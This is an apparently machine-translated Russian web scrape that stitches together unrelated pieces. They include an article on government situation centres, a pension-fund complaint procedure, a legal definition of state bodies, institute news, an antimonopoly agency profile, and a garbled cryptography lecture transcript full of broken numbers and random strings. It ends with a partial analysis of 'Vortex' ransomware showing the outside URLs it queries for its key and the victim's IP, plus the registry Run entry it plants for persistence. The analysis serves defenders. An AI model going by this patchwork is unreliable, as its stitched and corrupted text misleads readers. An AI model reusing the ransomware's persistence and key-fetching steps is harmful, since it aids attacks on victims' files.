Огв что это такое расшифровка
Интернет-издание о высоких технологиях
Современный СЦ для госуправления: расстановка акцентов
Многие ведомственные СЦ одновременно являются и одним из наиболее современных средств госуправления, и довольно ярким примером так называемого межведомственного феодализма. Тем не менее, объединение информационно-аналитических ресурсов разных ведомств является сегодня важным трендом, соответствующим общегосударственной стратегии создания информационного общества.
Особенностью человеческого восприятия является то, что подобного рода задачи лучше всего решаются с помощью образов. Принцип Single Customer View реализован сегодня в работе любого ситуационного центра (СЦ), что делает СЦ незаменимым инструментом, во-первых – для руководителя, во-вторых – для коллективной работы (с привлечением отраслевых экспертов), в-третьих – для подготовки персонала. Под СЦ сегодня все чаще понимают уже не инструмент для решения каких-то экстраординарных и чрезвычайных задач или, тем более, не атрибут, подчеркивающего статус организации, а скорее эффективное средство для повседневного управления органами государственной власти (ОГВ) и крупными госкорпорациями, позволяющее им системно планировать, прогнозировать, координировать работу и оценивать результат.
Делать акцент на людях и их потребностях, давая определение современного СЦ, абсолютно правильно. Тем не менее, необходимо вспомнить и об его основных функциях и техническом обеспечении. Поэтому кратко перечислим основные подсистемы СЦ и задачи, которые они решают, не углубляясь при этом в чисто технические детали.
Моделирование
Моделирование экономических процессов было важной и приоритетной темой на протяжении ряда последних десятилетий. Еще во времена СССР были созданы достаточно мощные для того времени ВЦ, развивалась академическая наука, ее достижения применялись в отраслевых НИИ, органах госуправления, на производстве. Более того, в связи с масштабами централизации экономики СССР вопросы “экономико-кибернетических операций” были весьма актуальны, имея при этом и отчетливо выраженную политическую составляющую. Достаточно в этой связи ознакомиться с достаточно бурными событиями, развернувшимися в свое время вокруг так называемой системы оптимального функционирования экономики (СОФЭ).
Вся эта проблематика сегодня актуальна и применительно к такому современному средству госуправления как СЦ, что абсолютно логично, поскольку именно прогнозирование и анализ возможных сценариев развития той или иной ситуации помогает руководителю действовать проактивно, упреждающе, получать новую уникальную информацию. Совершенно очевидно, что невозможно эффективно решать задачи государственного масштаба, не применяя, например, статистических методов анализа. По мнению ведущих специалистов OLAP-технологии, витрины данных, data mining, всевозможные модели предметных областей и экспертные системы находят сегодня свое эффективное применение при решении задач госуправления.
Можно подойти к этому вопросу и с другой стороны. Если наугад выбрать любую из самых современных технологий работы с информацией, существующую в рамках BI-подхода или за его пределами, то, вполне возможно, найдется небольшая госструктура, которая уже применила или готовится применить фрактальный анализ или же создает нейронную сеть в своем СЦ или ситуационной комнате.
Объективно оценить эффективность подобного рода деятельности в целом довольно проблематично, хотя есть отдельные примеры безусловных успехов в этом направлении. В то же время, складывается впечатление, что хотя интерес к всевозможным “продвинутым” средствам моделирования и анализа информации растет (и со временем даст свои результаты), аналитическую составляющую работы среднестатистического СЦ, выходящую за рамки составления отчетов, первичного структурирования, обработки и отображения поступающей информации сегодня “в целом по стране” несколько преувеличивают. Как бы там ни было, достаточно очевидно, что гораздо большее практическое значение пока имеет, например, оперативный и регулярный мониторинг, а также автоматизированная обработка и накопление актуальной для принятия управленческих решений информации.
Мониторинг и хранение информации
Подобно тому, как задачу моделирования в целях госуправления можно с той или иной степенью точности описать не очень-то подходящей для этого аббревиатурой BI, задачу управления разнообразной информацией, поступающей в СЦ, с чисто технической точки зрения можно попытаться свести к не менее известной проблеме под названием Enterprise content management (хотя, пожалуй, в данном случае аббревиатура ECM выглядит еще менее уместно). Понятно, что придуманные за рубежом термины и методы разрабатывались, в первую очередь, для крупных западных корпораций, поэтому может быть и близки, но не соответствуют полностью особенностям отечественного госуправления.
Тем не менее, если отвлечься от малопродуктивного спора о наименованиях, общепринятые для такого рода задач термины в первом приближении достаточно хорошо описывают суть дела. Ведь сбор, классификация, структурирование, первичная обработка разнородной информации, оптимальное проектирование хранилищ данных и т.п. – это важные задачи, стоящие перед создателями СЦ, отвечающего современным требованиям.
Причем основная трудность, пожалуй, кроется не столько в технической стороне вопроса, сколько в методологической. Без выделения группы основных параметров, актуальных для данной конкретной задачи управления, нельзя говорить о системности подхода к управлению, невозможно применить статистические методы, обосновать потребность СЦ в ресурсах и т.д. и т.п. На практике это обычно приводит к тому, что над созданием очередного СЦ совместно трудится рабочая группа разработчиков и отраслевых экспертов. Организация работы СЦ в режиме мониторинга во многом определяет то, насколько эффективным окажется этот инструмент в повседневной работе руководителя, а также в случаях необходимости срочно разрешить ту или иную возникшую ситуацию.
В качестве иллюстрации достаточно привести “классическую” задачу организации мониторинга СМИ, заключающуюся в сборе информации из разных источников и в самых разнообразных форматах (видео, аудио, статьи в отечественных и зарубежных СМИ, а также, в ряде случаев, данные, уже накопленные в других ведомственных информационных системах (ИС), базах знаний, статистических базах данных (БД), картографических сервисах, собранных из new-media и т.д. и т.п.), достаточно важную, как показывает практика, для любого ОГВ.
Заместитель начальника Управления информационных систем спецсвязи ФСО России, Николай Ильин кратко описал историю этого вопроса: “Мы начинали в 90-х годах, когда не было реальных данных по экономике. Тогда актуальной была проблема мониторинга общественно-политической ситуации. Это базировалось на обработке СМИ, поскольку других источников информации не было. Мы обеспечивали извлечение информации из СМИ и обработку результатов социологических опросов. Была сформирована большая служба, в каждом субъекте по 10-15 чел, которые могут проводить социсследования по этим методикам. Мы вполне успешно прогнозировали результаты парламентских и президентских выборов”.
В настоящее время все эти технологии активно развиваются и совершенствуются. Например, “видеопотоки из новостных лент, из основных наших каналов заносятся в базу данных. И сейчас нет никаких проблем с обработкой этих материалов, - сообщил г-н Ильин. – Мы очень хорошо работаем с семантическими картами. Блестяще работаем. Они строятся по материалам СМИ, откуда извлекается информация о взаимодействии физических и юридических лиц. Объекты размещаются на карте, показывается сила взаимодействия между ними и цепочки этого взаимодействия”.
Визуализация информации и телекоммуникации
Информацию, собранную, обработанную или же полученную различными способами, включая моделирование, экспертные оценки и пр., необходимо представить для всех участников коллективной работы и процесса выработки управленческих решений в максимально подходящем для этого виде - визуальном. Система ВКС была и остается ключевым элементом любого современного СЦ, позволяющим резко увеличить эффективность работы руководителя, построить на новом уровне диалог между территориально распределенными подразделениями, привлечь экспертов, вырабатывать качественные и обоснованные решения в реальном режиме времени.
"В процессе общения посредством ВКС качественно воспринимается 60% информации, поэтому ВКС является важным инструментом, позволяющим наиболее полноценно заменить общение личное, в ходе которого усваивается 80%", - считает сотрудник СЦ аппарата полномочного представителя президента РФ в Приволжском федеральном округе Сергей Байдин.
С технической точки зрения, использования ВКС, делает необходимым обеспечение СЦ ОГВ телекоммуникационными каналами, отвечающими необходимым требованиям по пропускной способности и информационной безопасности (ИБ). Актуальными являются программно-аппаратные решения, позволяющие снизить нагрузку на канал связи. Необходимо наличие помещений для размещения экрана коллективного пользования (с многоэкранным интерфейсом), рабочих мест участников совещаний и обслуживающего персонала СЦ, прочего оборудования.
Ситуационный центр Министерства обороны РФ
Отличительной чертой многих современных СЦ является, например, расширенное использование электронных карт, интеграция с геоинформационными системами, развитый интерактивный многослойный интерфейс, позволяющий, например, не только наложить информационные данные на картографическую основу, но и быстро, в наглядном виде детализировать ее по конкретному региону. Характерным отличием организации работы современных СЦ является повышенное внимание к разработке методик, гибких сценариев и алгоритмов, направляющих ход коллективного обсуждения, позволяющих проводить их наиболее эффективно, “технологично”, превратить СЦ в своего рода фабрику принятия качественных и своевременных управленческих решений.
Приоритеты и особенности
Если попытаться охватить ситуацию с российскими СЦ единым взглядом, то можно заметить, что стоимость создания СЦ год от года увеличивается. Одной из причин этого является постепенное изменение структуры затрат при создании новых СЦ. Если раньше большая их доля приходилась на “видимую часть” СЦ (видеостену или проекционную установку, ремонт помещения и т.п.), то сейчас все больше государственных средств расходуется на создание информационно-аналитических подсистем СЦ. Хотя при этом следует признать, что число сообщений в СМИ об уникальных результатах, достигнутых с их помощью, пока как минимум на порядок меньше, чем сообщений об их внедрениях.
Число СЦ и, соответственно, проводимых с их помощью совещаний, непрерывно увеличивается, сроки ввода новых СЦ в строй сокращаются. Создание системы СЦ, которая охватит в ближайшие годы все субъекты федерации, предусмотрено ключевыми государственными программами информатизации госсектора.
Точкой роста, вокруг которой система интегрированных между собою СЦ сегодня растет особенно интенсивно, являются ситуационные центры, обслуживающие первых лиц государства, в т.ч. мобильные, необходимые для сопровождения их во время поездок. “Создается центр управления системой ситуационных центров органов государственной власти. И руководители достаточно активно используют эти технологии для принятия решений, - рассказывает Николай Ильин. - Президент Российской Федерации, председатель правительства, министры, полномочные представители по округам, губернаторы... Практически два-три совещания проходят сегодня ежедневно с использованием этой технологии. Сейчас в год реально вводится в эксплуатацию по 10 ситуационных центров по федеральным региональным органам власти. Если мы потратили на первый СЦ четыре года, то сегодня его можно создать за 2 месяца, я имею ввиду программно-технический комплекс”.
Система взаимосвязанных между собой “правительственных” СЦ отличается тем, что к ним предъявляются повышенные требования к ИБ, отказоустойчивости, для чего используется сертифицированное оборудование. В их работе активно участвуют экспертно-аналитические службы анализа и прогнозирования, привлекаются ведущие эксперты, различные ведомства и крупнейшие госкорпорации, активно используются возможности технологии telepresence, необходимые для переговоров первых лиц и т.п.
Масштабы ведущихся работ по созданию новых СЦ позволяют говорить о том, что в этом направлении активно накапливается опыт и нарабатываются типовые решения, необходимые для того, чтобы впоследствии стало возможным максимально унифицировать и стандартизировать все российские СЦ ОГВ, объединить их между собой, консолидировать усилия, необходимые для того, чтобы сократить имеющееся отставание в деле применения передовых технологий моделирования и прогнозирования, отмечаемое большинством экспертов, организовать территориально распределенную обработку собранных данных и т.д. И, в частности, окончательно определиться с терминологией, что достаточно важно для успешного решения задач такого масштаба.
Предусмотрено развитие СЦ и в рамках целевых программ, таких как ФЦП "Снижение рисков и смягчение последствий чрезвычайных ситуаций природного и техногенного характера в Российской Федерации до 2015 года", в рамках масштабных национальных проектов по подготовке к Олимпийским играм и пр.
Мощным драйвером роста государственных СЦ по-прежнему является создание, развитие и модернизация СЦ, необходимых для предотвращения экстренных и чрезвычайных ситуаций, оперативной организации аварийно-спасательных работ, межведомственной координации дежурно-диспетчерских служб и др., таких как СЦ МЧС РФ. При этом также, в частности, активно задействуют выносные мобильные комплексы, интегрированные с системой ГЛОНАСС и пр. В рамках СЦ, обеспечивающих комплексную безопасность граждан, используется расширенный функционал систем видеонаблюдения, видео-аналитики и др.
Весьма востребованы СЦ для управления ключевыми отраслями экономики (ТЭК, энергетика и др.), сложными комплексными экономическими и стратегически значимыми хозяйственными объектами. В качестве примера можно привести ситуационно-кризисный центра «Росатома», СЦ «РЖД» и мн. др. Интересно отметить и крупные корпоративные СЦ, создаваемых, например, операторами мобильной связи, одной из целей которых является оперативное оповещение населения, находящегося на определенной территории о наступлении чрезвычайных ситуаций.
Ситуационный центр московского метрополитена
Источник: МК.ru
СЦ создаются отдельными государственными и муниципальными ведомствами, крупными промышленными предприятиями и т.д. По сути СЦ востребованы сегодня всюду, где имеются значительные информационные потоки, стоят сложные и масштабные управленческие задачи, а также существует техническая и финансовая возможность или государственная целесообразность их создания. В частности, в подавляющем большинстве случаев, уже через несколько месяцев после ввода СЦ в эксплуатацию, внедрившие их ОГВ и компании отмечают существенное снижение командировочных расходов, повышение качества управленческих решений и т.д. Рост сфер применения СЦ является сегодня мировым трендом (наряду с унифицированными коммникациями, облачными вычислениями и др.).
Нельзя не заметить, что весьма близким к СЦ функционалом обладают сегодня и всевозможные аварийно-диспетчерские службы и центры оперативного мониторинга, в частности, диспетчерские центры энергосистем, диспетчерские аэропортов и др. Их отличием часто является то, что они сочетают в себе некоторые характерные особенности СЦ и командного пункта, что позволяет немедленно исполнять принятые решения. Также для них характерна тесная интеграция с основными производственными процессами, высокая степень автоматизации, круглосуточная работа дежурного персонала, ориентированность, прежде всего, на строгое соблюдение регламентов, что в большинстве случаев позволяет провести достаточно четкую границу, отличающую их от ситуационных центров, важной задачей которых является помощь в выработке новых управленческих решений руководителем ОГВ или компании. В качестве примера можно привести Центр телеавтоматического управления движением транспорта УГАИ г. Москвы, координирующий в автоматическом режиме управление светофорными объектами, осуществляющий телевизионный надзор за ситуацией на дорогах и пр.
Следует также упомянуть использование СЦ и в других областях, в частности, в системе образования, что делает обучение студентов методам математического моделирования, системному анализу, технической стороне вопроса организации инфраструктуры современного СЦ практически ориентированным, а также ведет к появлению новых специальностей, таких как сценаристы и режиссеры СЦ и т.д.
Таким образом, важным моментом, который надо учитывать, отвечая на вопрос “Что такое современный СЦ?”, является то, что основной акцент сегодня делается не на технические аспекты его реализации (которые могут быть разными в каждом конкретном случае) или даже на отдельные его подсистемы, а на создание среды для общения и коллективной работы с информацией, наиболее подходящей к тем специфическим задачам, которые поставлены перед данным ОГВ. И начинать создание СЦ, поэтому, нужно с детального изучения потребностей организации.
Одиночество современных феодалов
В заключение следует упомянуть о том, что многие ведомственные СЦ одновременно являются и одним из наиболее современных средств госуправления, и довольно ярким примером так называемого межведомственного феодализма, чему, впрочем, есть и достаточно объективные причины. Тем не менее, текущая ситуация с быстроразвивающейся системой СЦ в стране пока такова, что они по-прежнему являются неким дополнительно-факультативным средством управления, реальную эффективность которого сложно оценить.
С руководителей министерств и ведомств, в первую очередь, спрашивают конечный результат, а законодательных и прочих стимулов унифицировать инфраструктуру и открывать свои данные смежному ведомству достаточно мало. Несмотря на то, что создание единого информационного пространства стоит на повестке дня, и можно даже найти высказывания экспертов о том, что именно система СЦ станет одним из интегрирующих факторов межведомственного взаимодействия, практика показывает, что об объединении информационных подсистем СЦ многие ведомства если сегодня и задумываются, то, пожалуй, в последнюю очередь.
Поэтому можно сделать вывод, что “горизонтальное” объединение информационно-аналитических ресурсов разных ведомств является сегодня важным трендом, соответствующим общегосударственной стратегии создания информационного общества. Достаточно очевидно, что этап во многом стихийного, недостаточно скоординированного роста системы обособленных, слабо-интегрированных СЦ подходит к концу, и одних только соображений прагматического порядка оказалось явно недостаточно для того, чтобы предотвратить появление очередного ведомственного “ИТ-зоопарка”, соблюсти необходимый баланс. Сегодня можно найти немало информации о внедрении новых СЦ, подробное описание их функционала и перспектив применения в самых разных сферах и областях управления. Смещение акцента на описание конкретных результатов, достигнутых благодаря созданию данного СЦ, сделало бы этот процесс более прозрачным, позволило бы более четко разграничить то, что должно было бы быть от того, что есть сегодня на самом деле.
Распоряжение средствами (частью средств) материнского капитала
Гражданин (его представитель) имеет право на досудебное (внесудебное) обжалование решений и действий (бездействия) ПФР, территориальных органов ПФР, их должностных лиц, МФЦ, а также работника МФЦ при предоставлении государственной услуги (жалоба).
В досудебном (внесудебном) порядке гражданин вправе обратиться с жалобой в письменной форме на бумажном носителе или в электронной форме в ПФР, территориальный орган ПФР, МФЦ либо в соответствующий орган государственной власти (орган местного самоуправления) публично‑правового образования, являющийся учредителем МФЦ (учредитель МФЦ):
- в ПФР — на решение и (или) действия (бездействие) руководителя структурного подразделения ПФР, ответственного за предоставление государственной услуги, руководителя территориального органа ПФР;
- в вышестоящий территориальный орган ПФР — на решение и (или) действия (бездействие) руководителя и (или) должностного лица нижестоящего территориального органа ПФР;
- к руководителю территориального органа ПФР — на решение и (или) действия (бездействие) должностного лица территориального органа ПФР;
- к руководителю МФЦ — на решения и действия (бездействие) работника МФЦ;
- к учредителю МФЦ или должностному лицу, уполномоченному нормативным правовым актом субъекта Российской Федерации, — на решения и действия (бездействие) МФЦ.
Информация о порядке подачи и рассмотрения жалобы размещается на информационных стендах в местах предоставления государственных услуг, на сайте ПФР, Едином портале, а также предоставляется в устной форме по телефону и (или) на личном приеме либо в письменной форме почтовым отправлением или электронным сообщением по адресу, указанному гражданином (его представителем).
Порядок досудебного (внесудебного) обжалования решений и действий (бездействия) территориального органа ПФР, предоставляющего государственную услугу, а также его должностных лиц регулируется:
- Федеральным законом от 27.07.2010 №210‑ФЗ;
- постановлением Правительства Российской Федерации от 16.08.2012 №840 «О порядке подачи и рассмотрения жалоб на решения и действия (бездействие) федеральных органов исполнительной власти и их должностных лиц, федеральных государственных служащих, должностных лиц государственных внебюджетных фондов Российской Федерации, государственных корпораций, наделенных в соответствии с федеральными законами полномочиями по предоставлению государственных услуг в установленной сфере деятельности, и их должностных лиц, организаций, предусмотренных частью 1.1 статьи 16 Федерального закона «Об организации предоставления государственных и муниципальных услуг», и их работников, а также МФЦ предоставления государственных и муниципальных услуг и их работников»;
- постановлением Правительства Российской Федерации от 20.11.2012 №1198 «О федеральной государственной информационной системе, обеспечивающей процесс досудебного (внесудебного) обжалования решений и действий (бездействия), совершенных при предоставлении государственных и муниципальных услуг».
Информация о праве граждан на досудебное (внесудебное) обжалование действий (бездействия) и (или) решений, принятых (осуществленных) в ходе предоставления государственной услуги ПФР, территориальными органами ПФР, их должностными лицами, МФЦ, а также работниками МФЦ, об органах, организациях и лицах, уполномоченных на рассмотрение жалобы, направленной в досудебном (внесудебном) порядке, способах информирования граждан о порядке подачи и рассмотрения жалобы, в том числе с использованием Единого портала, а также перечне нормативных правовых актов, регулирующих порядок досудебного (внесудебного) обжалования решений и действий (бездействия) ПФР, его территориальных органов, их должностных лиц, МФЦ, а также работников МФЦ, подлежит обязательному размещению на Едином портале.
ОРГАНЫ ГОСУДАРСТВЕННОЙ ВЛАСТИ РОССИЙСКОЙ ФЕДЕРАЦИИ И СУБЪЕКТОВ РОССИЙСКОЙ ФЕДЕРАЦИИ
Единоличные или коллегиальные органы, наделенные властными полномочиями, уполномоченные государством осуществлять его задачи и функции и действующие в установленном порядке. Государственная власть в РФ осуществляется на основе разделения на законодательную, исполнительную и судебную. Органы законодательной, исполнительной и судебной власти самостоятельны. Государственную власть в РФ осуществляют Президент РФ, ФС (СФ и ГД), Правительство РФ, суды РФ. Государственную власть в субъектах РФ осуществляют образуемые ими органы государственной власти. Разграничение предметов ведения и полномочий между органами государственной власти РФ и органами государственной власти субъектов РФ осуществляется Конституцией РФ, федеративными и иными договорами о разграничении предметов ведения и полномочий.
Порядок формирования О. г. в. устанавливается Конституцией РФ и законодательством РФ. Все О. г. в. представляют часть единой системы. Каждый из них имеет свое функциональное назначение и действует на основе собственной компетенции, в которой находят выражение присущие этому органу властные полномочия, позволяющие ему решать в пределах предоставленных прав определенные вопросы, издавать обязательные для исполнения акты и обеспечивать их исполнение. Властные полномочия всех О. г. в. взаимосвязаны. Президент РФ является главой государства. Он обеспечивает согласованное функционирование и взаимодействие О. г. в. ФС — парламент РФ — является представительным и законодательным О. г. в. РФ. ФС имеет двухпалатную структуру и состоит из СФ и ГД. Правительство РФ осуществляет исполнительную власть в РФ. Судебная власть в РФ осуществляется посредством конституционного, гражданского, административного и уголовного судопроизводства. Органами судебной власти являются Конституционный Суд РФ, Верховный Суд РФ, Высший Арбитражный Суд РФ, др. федеральные суды. В совокупности они образуют судебную систему РФ.
В структуру О. г. в. входят О. г. в. субъектов РФ. Система О. г. в. субъектов РФ устанавливается ими самостоятельно в соответствии с основами конституционного строя РФ и Федеральным законом от 6 окт. 1999 «Об общих принципах организации законодательных (представительных) и исполнительных органов государственной власти Российской Федерации», который устанавливает ответственность О. г. в. субъектов РФ за нарушение Конституции РФ, федерального законодательства. О. г. в. субъектов РФ обеспечивают соответствие принимаемых ими нормативных актов и осуществляемой ими деятельности Конституции РФ и федеральному законодательству. Принципами деятельности О. г. в. субъектов РФ являются единство системы государственной власти, верховенство Конституции РФ и федеральных законов на всей территории РФ, разделение государственной власти на законодательную, исполнительную и судебную и др. Систему О. г. в. субъекта РФ составляют: законодательный (представительный) орган государственной власти субъекта РФ, высший исполнительный орган государственной власти субъекта РФ, иные О. г. в. субъекта РФ, образуемые в соответствии с конституцией (уставом) субъекта РФ. Конституцией (уставом) субъекта РФ может быть установлена должность высшего должностного лица субъекта РФ. К судам субъектов РФ относятся конституционные (уставные) суды субъектов РФ, которые вправе создавать субъекты РФ, а также мировые судьи. Полномочия, осуществляемые О. г. в. субъекта РФ по предметам ведения субъектов РФ, определяются конституцией (уставом), законами и принимаемыми в соответствии с ними иными нормативными правовыми актами субъекта РФ. Полномочия, осуществляемые О. г. в. субъекта РФ по предметам совместного ведения, определяются Конституцией РФ, федеральными законами, договорами о разграничении полномочий и соглашениями. Полномочия, осуществляемые О. г. в. субъекта РФ по предметам ведения РФ, определяются федеральными законами, издаваемыми в соответствии с ними нормативными правовыми актами Президента РФ и Правительства РФ, а также соглашениями. В РФ органы местного самоуправления не входят в систему О. г. в.
1 июня завершилась весенняя серия «Киберсред» для школьников ЦМИТ ИПУ РАН возобновит работу со школьниками в сентябре 3 июня 2022 | |
Дмитрий Александрович Новиков избран академиком РАН Поздравляем! 2 июня 2022 | |
В ИПУ прошло Общее собрание ОЭММПУ РАН На повестке – выборы кандидатов в члены-корреспонденты и академики 31 мая 2022 | |
Школа-конференция УБС-2022 5–8 сентября 2022 г. В этот раз конференцию примет ЮУрГУ 30 мая 2022 | |
Как узнать, что нас ждет и к чему готовиться? Ю. В. Сидельников отвечает на вопросы журналистов «Радио Звезда» 30 мая 2022 | |
«За окошком месяц май» – отчетный месяц молодежных научных школ О результатах доложила двадцать одна школа ИПУ РАН 27 мая 2022 | |
Журнал Advances in Systems Science and Applications вошёл в Q2 по версии SCImago Journal Rank Поздравляем всех причастных! 23 мая 2022 | |
Круглый стол «Перспективы развития научно-образовательной сети» Заседание состоялось 17 мая 2022 года 19 мая 2022 | |
Открытие сельскохозяйственного сезона в ИПУ РАН Ученики московских школ №1282 и №185 приняли участие в посевных работах 19 мая 2022 | |
Фуад Алескеров. «Я – математик» «Любите математику в себе, а не себя в математике». Не-Станиславский 18 мая 2022 |
ФАС России | О ФАС России
Федеральная антимонопольная служба (ФАС России) является уполномоченным федеральным органом исполнительной власти, осуществляющим функции по принятию нормативных правовых актов, контролю и надзору за соблюдением законодательства в сфере конкуренции на товарных рынках, защиты конкуренции на рынке финансовых услуг, деятельности субъектов естественных монополий и рекламы.
ФАС России осуществляет контроль за соблюдением законодательства о контрактной системе в сфере закупок товаров, работ, услуг для обеспечения государственных и муниципальных нужд, выполняет функции по контролю за осуществлением иностранных инвестиций в Российской Федерации.
Согласно Постановлению Правительства РФ №1489 от 25 декабря 2014 года ФАС России переданы функции Федеральной службы по оборонному заказу (Рособоронзаказ) по контролю в сфере государственного оборонного заказа. Постановление вступило в силу 1 января 2015 года. Указом Президента РФ №373 от 21 июля 2015 года ФАС России переданы функции в сфере тарифного регулирования.
Федеральная антимонопольная служба создана в соответствии с Указом Президента России № 314 от 9 марта 2004. Положение о Федеральной антимонопольной службе принято Правительством России 30 июня 2004 г. ФАС России - федеральный орган исполнительной власти, руководство деятельностью которого осуществляет Правительство Российской Федерации.
В настоящее время антимонопольный контроль в регионах Российской Федерации осуществляют 84 территориальных подразделения Федеральной антимонопольной службы. Численность работников службы в регионах составляет 2315 человек. Представительства ФАС России за рубежом, а также подведомственные ей органы государственной власти отсутствуют. Численность работников центрального аппарата составляет 1189 человек. Основная часть руководителей управлений и отделов ФАС России - люди в возрасте от 27 до 35 лет.
ФАС России сертифицирована на соответствие требованиям международного стандарта менеджмента качества ISO 9001. 17 января 2012 года ведомством получен первый сертификат, удостоверяющий соответствие стандарту ISO 9001:2008.
На протяжении последующих лет Федеральная антимонопольная служба неоднократно подтверждала своё соответствие стандарту качества, актуализируя свою деятельность в соответствии с лучшими мировыми практиками.
Таким образом, 18 января 2018 года после успешного прохождения ведомством очередного сертификационного аудита, ФАС России получила сертификат соответствия новейшему стандарту ISO 9001:2015.
Постановление Правительства Российской Федерации от 30.06.2004 г. №331 «Об утверждении Положения о Федеральной антимонопольной службе»
Приказ от 14.10.2004 №138 "О символике Федеральной антимонопольной службы"
Приказ от 23.11.2004 №182 "О символике Федеральной антимонопольной службы"
Приказ ФАС России от 03.06.2020 N 521/20 (ред. от 02.02.2022) "О функциональном распределении обязанностей между структурными подразделениями центрального аппарата ФАС России"
Введение в практическую криптографию — ID: 600fa43008171
Стенограмма
Введение в практическую криптографию Якуб Мария Ющакевич Академическая ассоциация информационных технологий 6 марта 2012 г. Якуб Мария Ющакевич 1/26 Ход лекции Расписание лекций Что такое криптография? Шифры и ключи Какие пароли лучше? Применение Якуб Мария Ющакевич 2/26 Что такое криптография? Криптография + Криптоанализ = Криптология Якуб Мария Ющакевич 3/26 Раздел шифров Исторические симметричные блочные шифры Асимметричный Якуб Мария Ющакевич 4/26 Как работает блочный шифр? Якуб Мария Ющакевич 5/26 ЕЦБ — шифрование Якуб Мария Ющакевич 6/26 ЕЦБ — расшифровка Якуб Мария Ющакевич 7/26 CBC — шифрование Якуб Мария Ющакевич 8/26 CBC - расшифровка Якуб Мария Ющакевич 26 сентября CFB — шифрование Якуб Мария Ющакевич 26.10. CFB — расшифровка Якуб Мария Ющакевич 26.11 OFB — шифрование Якуб Мария Ющакевич 26.12 ОФБ — расшифровка Якуб Мария Ющакевич 13/26 Хэш-функция Примеры хеш-функций: MD4, MD5, RMD-160, SHA-1, SHA-2 (224, 256, 384, 512) Якуб Мария Ющакевич 14/26 Размер ключа и безопасность Время проверки размера ключа * 32 бита примерно 1 час 12 минут 33 бита примерно 2 часа 23 минуты 56 бит 2283 года 128 бит 10782897524556318080696079 лет * - 1 000 000 проверок в секунду Якуб Мария Ющакевич 15/26 Какие пароли безопасны? Сильный.#?HaSlO tojesthasloktorelat вы должны помнить Якуб Мария Ющакевич 16/26 Какие пароли безопасны? MoCnE.#?HaSlo 13 100 = 1000000000000000000000000000 tojesthasloktorelat помнить 2631 = 731431714333403393900724146770015259539275776 Якуб Мария Ющакевич 17/26 Радужные столы Сформированные таблицы с сокращениями Как обезопасить себя? - Соль. Якуб Мария Ющакевич 18/26 wQPMLUD3kQgz03rLxEobOg UMI7wa7lpus4WiuwWlk1DAgkAJtzGyXi6ldWc270 ExOlz6pURJAuI1f6QZKPVPstAtU0f90wg+24jT6P GFJyW5CjFtr63FvYrYxs7PerAQzSk2FBLKDi0CgP Ll7WA75YLBNbeQe1NVtFwrtqfnJ3GjeJ5fwq0BgX 9ZVNR45BFR+Cvky8qtr1zrPIMIGvYLZZZORGPX4 038Mfh7qjXhaYgNqVePkhZARleFRjmPMJUr7kIj GT040zHbiUU1V87HhVfvV3pCTC1xAxXZxzgrxqDB bZwXrEZc3AuFq0FjxQl3Yk+20hG7M6TDL5bnIGJH OAkxLy2x0URBOnlGoHA Якуб Мария Ющакевич 19/26 Unbreakable cipher XOR 0 1 0 0 1 1 1 0 Stream cipher 01000111000010 1001000100101010001010010 101001100101010101010001101111010010000 111000010101111110010101000101011000010 101001100101010101010001101100010010100100001000100101001000010001001010010000 Якуб Мария Ющакевич 20/26 - ключ сообщения зашифрованный текст ключ сообщение Блюм-Блюм-Шуб xn + 1 = (xn) 2modM M = xy xmod4 = 3 y mod4 = 3 НОД (φ (x - 1), φ (y - 1)) .90 000 Неуловимый польский шифровальщик с арабским акцентом наконец поймал 90 001Иногда некоторые преступники немного умнее конкурентов и находят способы затруднить анализ своей деятельности. Мы столкнулись с таким случаем в начале этого года, но в итоге его частично разрешили.
В конце января жертвы нового типа программ-вымогателей начали обращаться к специалистам по безопасности. Эти случаи были интересны по двум причинам.Во-первых, автор шифровальщика оказался поляком, а во-вторых, никто не смог найти образец шифровальщика или узнать способ его распространения, хотя жертв было как минимум несколько. Однако постепенно вы можете раскрыть секрет и заглянуть в чрезвычайно любительскую, но, к сожалению, вероятно, эффективную польскую программу-вымогатель.
Анонимные аналитики по следу
На сайте Pastebin появились первые следы польского вымогателя. Удалось выяснить, что с автором программы можно связаться по адресу [email protected] или [email protected], а также по номеру GaduGadu 61621122.Стоимость расшифровки данных должна была составить 249 долларов, а обслуживание клиентов оказалось полностью ручным. Долгое время ничего существенного не происходило (кроме появления новых жертв) до вчерашнего дня, когда был анонсирован образец вредоносного ПО.
#Vortex #ransomware, полировка, добавление расширения .aes. (1/60) https://t.co/dt3kJYcAev pic.twitter.com/JAYr66JyZm
- Карстен Хан (@struppigel) 9 марта 2017 г.
Выяснилось, что программа-вымогатель эволюционировала, что можно узнать по отсутствующему в более ранних заметках названию «Vortex».В сети уже появились первые достаточно строгие анализы, и Orange заблокировал своим клиентам доступ к управляющим серверам. Наша команда анонимных аналитиков посмотрела на выложенный образец и хотя долго смеялась над методами его работы, но признала, что простого метода восстановления файлов не существует.
Албанский шифровальщик
Помните албанский вирус, который всем приходилось запускать самому? Этот вымогатель очень похож. Мы разберемся с методом его распространения через мгновение, давайте начнем с построения.Программа написана на C# и никак не обфусцирована, не упакована и не зашифрована. Просто загрузите его в приложение dotPeek, чтобы просмотреть его от начала до конца. Причем программа в основном использует проект AESxWin, расположенный на GitHub. AESxWin — это программа, которая, по словам ее автора, должна использоваться для шифрования файлов, отправляемых в облако, с помощью алгоритма AES — и она действительно выглядит так, но была модифицирована. После запуска выдает вот такое окно.
Интересно, что быстрое нажатие на кнопку "Стоп" останавливает шифрование файлов. Об уровне продвинутости «разработчика» этого шифровальщика свидетельствует и фрагмент кода, запускающий процесс шифрования, в котором вместо непосредственного вызова конкретной функции в приложении автор запускает событие «Click» на кнопку, и только эта кнопка активирует соответствующую функцию. # Аналитик CriedHowAnalyzed
При запуске программы-вымогателя ему в первую очередь нужен ключ для шифрования файлов.Автор решил обойти создание этого сложного кода (которого не было в обрабатываемом приложении) и решил обратиться к общедоступному сервису. Запрос, отправленный на сервер, выглядит так:
http://www.sethcardoza.com/api/rest/tools/random_password_generator/length:40/complexity:alphaNumeric
В ответ программа получает строку из 40 символов, которая выглядит случайной (проверка ее случайности — отдельная задача, за которую мы не беремся). На следующем этапе программа проверяет IP-адрес зараженного компьютера.В очередной раз задача переросла модификатор, потому что ссылается на внешний сервер:
https://api.ipify.org/
Получает в ответ IP-адрес. Программа также добавляет раздел реестра для обеспечения перезагрузки в случае возникновения проблем.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Выполнить] «AESxWin» = «c:\directory\filename.exe»
